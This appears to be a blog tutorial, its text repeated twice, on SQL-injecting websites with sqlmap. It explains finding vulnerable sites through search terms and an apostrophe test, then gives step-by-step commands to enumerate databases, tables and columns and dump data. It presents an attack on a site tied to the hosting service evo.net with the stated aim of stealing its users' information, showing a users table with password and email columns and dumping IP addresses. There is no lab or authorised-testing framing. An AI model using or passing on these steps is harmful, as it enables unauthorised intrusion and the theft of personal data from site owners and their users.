How to SQL inject a website!
Pre requirements:
SQLmap or Kali Linux
To begin you need to find a website that is vulnerable. To find one try using search terms along the lines of: php?id= , login.php?id= , index.php?id= , etc.
To test if a website is vulnerable you can add an appostrophe (‘) to the end of the URL.
If the website is vulnerable you will get an error that looks like this: http://www.xyz.net/inventory.php?id=173, or similiar.
Now you can go to your command line and type: sqlmap -u (URL) –dbs
Now you will get a message like this:
available dabases (number of databases found) sql vulnerable sites
[*] database 1
[*] database 2
[*] database 3
note: the number of databases may vary
now it is time to scan a database to detect tables. To do this type:
sqlmap -u (URL) -D (choose a database) –tables
Now you will get a message like this:
Database: (the database you chose)
(the number of tables) tables
+———-+
|(table 1) |
|(table 2) |
|(table 3) |
+———-+
Now you can check a table for columns. To do this type:
sqlmap -u (URL) -D (the database you chose) -T (choose a table) –columns
Now you will get a message like this:
Database: (the database you chose)
Table: (the table you chose)
[(Number of columns) columns]
+—————+
|Column |Type |
+—————+
|column|dataType|
|column|dataType|
|column|dataType|
+—————+
Now you can dump the data in the column by typing:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) –dump
Now lets penetrate an actual database using this knowledge.
In this example we will penetrate evo.net, a web hosting service by penetrating a website linked to their host’s database to steal information about evo.net’s users.
First let’s go to http://www.xyz.net/inventory.php?id=173 and use the apostrophe test to see if it is vulnerable
We this an sql error. That means it is vulnerable!
Now we can open up the command line and type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 –dbs
We now get this message:
available databases [8]:
[*] information_schema
[*] urbanm2_
[*] urbanm2_bbforum
[*] urbanm2_cdub
[*] urbanm2_db
[*] urbanm2_nom
[*] urbanm2_wedding
[*] urbanm2_wp
Now let’s select urbanm2_cdub. Let’s type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub –tables
Now we get this:
Database: urbanm2_cdub
[12 tables]
+—————-+
| evo_antispam |
| evo_blogs |
| evo_blogusers |
| evo_categories |
| evo_comments |
| evo_groups |
| evo_hitlog |
| evo_locales |
| evo_postcats |
| evo_posts |
| evo_settings |
| evo_users |
+—————-+
Now we can select users by typing:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users –columns
You should get this message:
Database: urbanm2_cdub
Table: evo_users
[21 columns]
+—————-+——————+
| Column | Type |
+—————-+——————+
| dateYMDhour | datetime |
| ID | int(10) unsigned |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_grp_ID | int(4) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(10) unsigned |
| user_locale | varchar(20) |
| user_login | varchar(20) |
| user_msn | varchar(100) |
| user_nickname | varchar(50) |
| user_notify | tinyint(1) |
| user_pass | varchar(32) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+—————-+——————+
Finally you can find information, such as IP addresses, by typing:
sqlmap -u http://www.atacar.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users -C user_ip –dump
To recap we penetrated a poorly designed web applicaton on a website to hack their host’s database, then accessing a database connected to their host’s.
We then accessed the evo_users table and the user_ip column to dump user ip adddesses.
SQLmap or Kali Linux
To begin you need to find a website that is vulnerable. To find one try using search terms along the lines of: php?id= , login.php?id= , index.php?id= , etc.
To test if a website is vulnerable you can add an appostrophe (‘) to the end of the URL.
If the website is vulnerable you will get an error that looks like this: http://www.xyz.net/inventory.php?id=173, or similiar.
Now you can go to your command line and type: sqlmap -u (URL) –dbs
Now you will get a message like this:
available dabases (number of databases found) sql vulnerable sites
[*] database 1
[*] database 2
[*] database 3
note: the number of databases may vary
now it is time to scan a database to detect tables. To do this type:
sqlmap -u (URL) -D (choose a database) –tables
Now you will get a message like this:
Database: (the database you chose)
(the number of tables) tables
+———-+
|(table 1) |
|(table 2) |
|(table 3) |
+———-+
Now you can check a table for columns. To do this type:
sqlmap -u (URL) -D (the database you chose) -T (choose a table) –columns
Now you will get a message like this:
Database: (the database you chose)
Table: (the table you chose)
[(Number of columns) columns]
+—————+
|Column |Type |
+—————+
|column|dataType|
|column|dataType|
|column|dataType|
+—————+
Now you can dump the data in the column by typing:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) –dump
Now lets penetrate an actual database using this knowledge.
In this example we will penetrate evo.net, a web hosting service by penetrating a website linked to their host’s database to steal information about evo.net’s users.
First let’s go to http://www.xyz.net/inventory.php?id=173 and use the apostrophe test to see if it is vulnerable
We this an sql error. That means it is vulnerable!
Now we can open up the command line and type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 –dbs
We now get this message:
available databases [8]:
[*] information_schema
[*] urbanm2_
[*] urbanm2_bbforum
[*] urbanm2_cdub
[*] urbanm2_db
[*] urbanm2_nom
[*] urbanm2_wedding
[*] urbanm2_wp
Now let’s select urbanm2_cdub. Let’s type:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub –tables
Now we get this:
Database: urbanm2_cdub
[12 tables]
+—————-+
| evo_antispam |
| evo_blogs |
| evo_blogusers |
| evo_categories |
| evo_comments |
| evo_groups |
| evo_hitlog |
| evo_locales |
| evo_postcats |
| evo_posts |
| evo_settings |
| evo_users |
+—————-+
Now we can select users by typing:
sqlmap -u http://www.xyz.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users –columns
You should get this message:
Database: urbanm2_cdub
Table: evo_users
[21 columns]
+—————-+——————+
| Column | Type |
+—————-+——————+
| dateYMDhour | datetime |
| ID | int(10) unsigned |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_grp_ID | int(4) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(10) unsigned |
| user_locale | varchar(20) |
| user_login | varchar(20) |
| user_msn | varchar(100) |
| user_nickname | varchar(50) |
| user_notify | tinyint(1) |
| user_pass | varchar(32) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+—————-+——————+
Finally you can find information, such as IP addresses, by typing:
sqlmap -u http://www.atacar.net/inventory.php?id=173 -D urbanm2_cdub -T evo_users -C user_ip –dump
To recap we penetrated a poorly designed web applicaton on a website to hack their host’s database, then accessing a database connected to their host’s.
We then accessed the evo_users table and the user_ip column to dump user ip adddesses.
Comments
Post a Comment